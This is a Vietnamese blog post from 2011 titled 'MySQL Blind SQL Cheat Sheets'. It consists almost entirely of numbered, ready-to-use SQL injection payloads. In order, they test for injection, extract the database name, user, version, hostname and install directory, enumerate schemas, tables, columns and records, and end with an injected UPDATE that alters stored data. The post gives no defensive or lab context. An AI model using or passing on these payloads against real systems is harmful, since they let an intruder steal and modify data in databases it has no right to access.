1. To test blind injection
Trích dẫn:
' and 'x'='x
2. To select the current database (Output will be in Hexadecimal, decode to ASCII
Trích dẫn:
' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
3. To find the current user
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
4. To find MySQL Version
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
5. Find current database
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
6. To find the system user
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
7. To find the hostname
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
8. To find the installation directory
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
9. To find the DB User
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
10. To find the databases
Note: Keep incrementing the n, e.g. : n, n+1, n+2, ... till you keep getting a response.
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
11. To count the number of tables in the selected database
Note: Note this count as n
Replace colored strings with appropriate value
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
12. To get the table names in the selected database
Note: m-n implies execute this query starting from m, m+1…n-1
Replace colored strings with appropriate value
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
13. To get number of columns in the selected table name
Note: Note this count as n
Replace colored strings with appropriate value
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
14. To get column names of a selected table name
Note: m-n implies execute this query starting from m, m+1…n-1
Replace colored strings with appropriate value
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
15. To count the number of records in a selected column
Note: Remember this count as n
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT concat(0x7e,0x27,count
,0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
16. To fetch records from a selected column
Note: m-n implies execute this query starting from m, m+1…n-1
Replace colored strings with appropriate value
Trích dẫn:
1' and(select 1 from(select count
,concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
17. Update a record in the selected column
Trích dẫn:
1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value--
Thứ Ba, 14 tháng 6, 2011
MySQL Blind SQL Cheat Sheets
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào:
Đăng nhận xét